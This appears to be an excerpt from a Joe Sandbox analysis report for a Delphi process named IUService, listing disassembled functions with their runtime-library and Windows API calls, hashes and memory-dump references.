                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$Unicode$String$Char$qqrx20FileFreeInfoMem$qqriMem$qqrpvVersion$Asg$qqrr20Move$qqrpxvpviQuerySizeString$qqriString$qqrr20Stringx20UniqueValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3340374955-0
                                                                                                                                            • Opcode ID: dddfb272de7c6e7c87dd35fe2d24d2a7e29585c5b1d1b6a14b8fcc4ff7acbc84
                                                                                                                                            • Instruction ID: 20c290cfac2a6ec53872fbffc8a20628a873dcac3785a9ff7ef993043faeba55
                                                                                                                                            • Opcode Fuzzy Hash: dddfb272de7c6e7c87dd35fe2d24d2a7e29585c5b1d1b6a14b8fcc4ff7acbc84
                                                                                                                                            • Instruction Fuzzy Hash: 69215871A0568AAFDB01DFE9ED51C6EB7FCEF49200B914672B504E3251D734AE04C690
                                                                                                                                            Function 50034A34 Relevance: 15.1, APIs: 10, Instructions: 66COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(00000000,50034AEC,?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034A53
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034A72
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034A8F
                                                                                                                                            • @Sysutils@LowerCase$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034A9A
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034AA4
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034AB0
                                                                                                                                            • @Sysutils@UpperCase$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034ABB
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034AC5
                                                                                                                                            • @Variants@VarInvalidOp$qqrv.RTL120(?,?,?,00000000,00000000,00000000,00000000,?,50035965,?,?,?,?), ref: 50034ACC
                                                                                                                                              • Part of subcall function 500307FC: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030846,?,00000000), ref: 50030817
                                                                                                                                              • Part of subcall function 500307FC: @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030846,?,00000000), ref: 50030826
                                                                                                                                              • Part of subcall function 500307FC: @System@@RaiseExcept$qqrv.RTL120(00000000,50030846,?,00000000), ref: 5003082B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$String$Unicode$System@@$FromWide$Sysutils@$Case$qqrx20Str$qqrr17Str$qqrr20Stringx17Stringx20Variants@$Check$qqrlususClr$qqrpvExcept$qqrvException@$bctr$qqrx20FreeInvalidLoadLowerOp$qqrvRaiseResultString$qqrp20Upper
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1787277866-0
                                                                                                                                            • Opcode ID: 1fcb6342362c8eb2675f5850fad802939ed4ea52e9e2d599269feaa4d86d904b
                                                                                                                                            • Instruction ID: 28ee5e0d826e7c4dbe94008d08a8dd18efc8e78135a813a0b291ff3b53295a70
                                                                                                                                            • Opcode Fuzzy Hash: 1fcb6342362c8eb2675f5850fad802939ed4ea52e9e2d599269feaa4d86d904b
                                                                                                                                            • Instruction Fuzzy Hash: FC11E270640585AFEF01EBA4DCA2DEEB3A8EF45200F908776B900EB651D6B0BD0587D6
                                                                                                                                            Function 50006ADC Relevance: 15.0, APIs: 10, Instructions: 48COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@TObject@ClassName$qqrv.RTL120(00000000,50006B69), ref: 50006B08
                                                                                                                                              • Part of subcall function 50006AC4: @System@UTF8ToString$qqrrx28System@%SmallString$iuc$255%.RTL120 ref: 50006AD1
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50006B69), ref: 50006B10
                                                                                                                                              • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50006B69), ref: 50006B15
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,50006B69), ref: 50006B1E
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,00000000,00000000,50006B69), ref: 50006B27
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,50006B69), ref: 50006B2C
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,00000000,50006B69), ref: 50006B35
                                                                                                                                            • CompareStringW.KERNEL32(?,00000001,00000000,00000000,00000000,00000000,00000000,50006B69), ref: 50006B43
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$String$System@@$Char$qqrx20EnsureLen$qqrx20String$qqrr20System@%$AnsiClassCompareFromInternalName$qqrvObject@SmallStr$qqrr20String$iuc$255%String$qqrrx28Stringx27T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2698194505-0
                                                                                                                                            • Opcode ID: 7a18ea293cba9f4f732223db10a86afe3026c92dbc0af962d2106ebeff8d67eb
                                                                                                                                            • Instruction ID: 07edf7bba6b7798c112338542bf63ced82e12cf919ecdcd04dcacc31e71116a0
                                                                                                                                            • Opcode Fuzzy Hash: 7a18ea293cba9f4f732223db10a86afe3026c92dbc0af962d2106ebeff8d67eb
                                                                                                                                            • Instruction Fuzzy Hash: 9D017174505288AFEB10EBE4EC6299EB7BCEF59310F904677B404E3652DB30AA009696
                                                                                                                                            Function 5001C4D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C580), ref: 5001C503
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                                                              • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C580), ref: 5001C52A
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C580), ref: 5001C550
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,5001C580), ref: 5001C55D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$Sysutils@$Cat3$qqrr20Char$qqrx20Copy$qqrx20Delimiter$qqrx20LastScan$qqrpxbbStringiiStringt1Stringt2Stringx20
                                                                                                                                            • String ID: .\:
                                                                                                                                            • API String ID: 2717076658-496007442
                                                                                                                                            • Opcode ID: a89fb4eec0d62e8afcb9bcc628ec571381857e07fc04220a90b3bcf355591fdb
                                                                                                                                            • Instruction ID: d01c72174dcf2e075b5b8dd55ecc10e744eed8894acf6479d7133b6cc06a8146
                                                                                                                                            • Opcode Fuzzy Hash: a89fb4eec0d62e8afcb9bcc628ec571381857e07fc04220a90b3bcf355591fdb
                                                                                                                                            • Instruction Fuzzy Hash: 9B119330A00688EBDB04DFE9D89199DB3F9EF49310BA083B6E41093251EB70EF81DA40
                                                                                                                                            Function 50005914 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,B",?,?,?,00000000), ref: 50005949
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,B",?,?,?,00000000), ref: 50005952
                                                                                                                                            • MoveFileW.KERNEL32(00000000), ref: 50005958
                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,B",?,?,?,00000000), ref: 5000597D
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(00000000,?,00000000,B",?,?,?,00000000), ref: 50005982
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(00000000,B",?,?,?,00000000), ref: 5000598E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Res$qqriSystem@@Unicode$Array$qqrr20Char$qqrx20ErrorFileFromLastMoveStringStringpbi
                                                                                                                                            • String ID: B"
                                                                                                                                            • API String ID: 3244090159-4078893311
                                                                                                                                            • Opcode ID: 4a2eb7b6fd8b58eeb8d6c45eddf589e6c8aac0e0df426a6a7fc9b1bc2b78b412
                                                                                                                                            • Instruction ID: df590b721be1972d76404118b1dd1283823992a997f97f748f899e6b97df8a74
                                                                                                                                            • Opcode Fuzzy Hash: 4a2eb7b6fd8b58eeb8d6c45eddf589e6c8aac0e0df426a6a7fc9b1bc2b78b412
                                                                                                                                            • Instruction Fuzzy Hash: 3601F5302056C5DAFB20EBA4D9B16AF72ECDF59222FD00A76F640D2112E6659E0081A5
                                                                                                                                            Function 5001062C Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 48COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                                                            • @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                                                              • Part of subcall function 5002A908: GetLastError.KERNEL32(50010679,00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5002A908
                                                                                                                                              • Part of subcall function 5002A908: @Sysutils@RaiseLastOSError$qqri.RTL120(50010679,00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5002A90D
                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                                                            • @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                                                            • LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                                                            • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Last$RaiseSysutils@$Error$qqrvResource$ErrorError$qqriFindLoadLock
                                                                                                                                            • String ID: CHARTABLE$PkP
                                                                                                                                            • API String ID: 2693630376-1680022972
                                                                                                                                            • Opcode ID: 1eb605201eaa7e6766b98b1e00adbd3eb7b47462771e20d424d66e1f26d623af
                                                                                                                                            • Instruction ID: cc429218ece2e4869d3c0890a31dc3911705f99bbb730b9440c9ee6bded52d1b
                                                                                                                                            • Opcode Fuzzy Hash: 1eb605201eaa7e6766b98b1e00adbd3eb7b47462771e20d424d66e1f26d623af
                                                                                                                                            • Instruction Fuzzy Hash: 9D0144B47517818FE71CDF94EDA099577F5BB98310B09862DE182D7761CB78D880CB60
                                                                                                                                            Function 50008524 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 38filewindowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000855D
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF,?,?,?,?,?,?,500086BE,500041BB), ref: 50008563
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,500085B0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF), ref: 50008578
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,500085B0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF), ref: 5000857E
                                                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 5000859C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                                                            • String ID: 0CP$Error$Runtime error at 00000000
                                                                                                                                            • API String ID: 1570097196-3976705077
                                                                                                                                            • Opcode ID: c7f65587848cdab12b096d8458637050e43fc9a3475b859aec640a5b1c1ffc15
                                                                                                                                            • Instruction ID: 13760cef71b14ba24bdf52ca3db3f2b841d9a020471f696476a3b083ba67eecc
                                                                                                                                            • Opcode Fuzzy Hash: c7f65587848cdab12b096d8458637050e43fc9a3475b859aec640a5b1c1ffc15
                                                                                                                                            • Instruction Fuzzy Hash: 14F0F652901AC0BAFA1093D06C62FC535989BA0A29FD8470AF650690D2E77445C49722
                                                                                                                                            Function 5001B598 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 27COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(5001B7D4), ref: 5001B59D
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5001B5CA
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000001,5001B7D4), ref: 5001B5B8
                                                                                                                                              • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(5001B7D4), ref: 5001B5D4
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000001,5001B7D4), ref: 5001B5EF
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5001B601
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$ArraySystem@$Length$qqrvUnicode$Asg$qqrr20StringStringx20$Length$qqrrpvpvipi
                                                                                                                                            • String ID: False$True
                                                                                                                                            • API String ID: 1602069110-1895882422
                                                                                                                                            • Opcode ID: dc1f99dea7fc06d24d915c1314f15eaf0c255ee8a481010edc47a443f1a80566
                                                                                                                                            • Instruction ID: a813428639982090d4a362bd633a8cf1e7a719357de9231205594663fbfa07b6
                                                                                                                                            • Opcode Fuzzy Hash: dc1f99dea7fc06d24d915c1314f15eaf0c255ee8a481010edc47a443f1a80566
                                                                                                                                            • Instruction Fuzzy Hash: FBF01C7170118197F714A7E4FC52B6A33A2EBA0714F404239FA448F6A6DB6AFC818BC1
                                                                                                                                            Function 5000730C Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@TMonitor@TryEnter$qqrv.RTL120 ref: 5000731C
                                                                                                                                              • Part of subcall function 500076F4: GetCurrentThreadId.KERNEL32 ref: 500076F7
                                                                                                                                            • GetTickCount.KERNEL32 ref: 50007343
                                                                                                                                            • GetTickCount.KERNEL32 ref: 50007355
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 50007388
                                                                                                                                            • GetTickCount.KERNEL32 ref: 500073AC
                                                                                                                                            • GetTickCount.KERNEL32 ref: 500073E6
                                                                                                                                            • @System@TMonitor@GetEvent$qqrv.RTL120 ref: 500073F1
                                                                                                                                            • GetTickCount.KERNEL32 ref: 50007410
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 50007486
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountTick$CurrentThread$Monitor@System@$Enter$qqrvEvent$qqrv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1987720909-0
                                                                                                                                            • Opcode ID: 20729751b9ca491032756733baeeb24b399c546541366898f273070eb1456356
                                                                                                                                            • Instruction ID: cdbcf1bc501056cecbbc3dd38a171081e16c6904e9569bf655de2ffa8f35bad7
                                                                                                                                            • Opcode Fuzzy Hash: 20729751b9ca491032756733baeeb24b399c546541366898f273070eb1456356
                                                                                                                                            • Instruction Fuzzy Hash: 0741C830A097C15AF311EE7CD6A93AEBFD15F94240F948B1ED9DC87282DB79C8408352
                                                                                                                                            Function 5000B174 Relevance: 13.6, APIs: 9, Instructions: 114COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B1A3
                                                                                                                                            • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B1F5
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B209
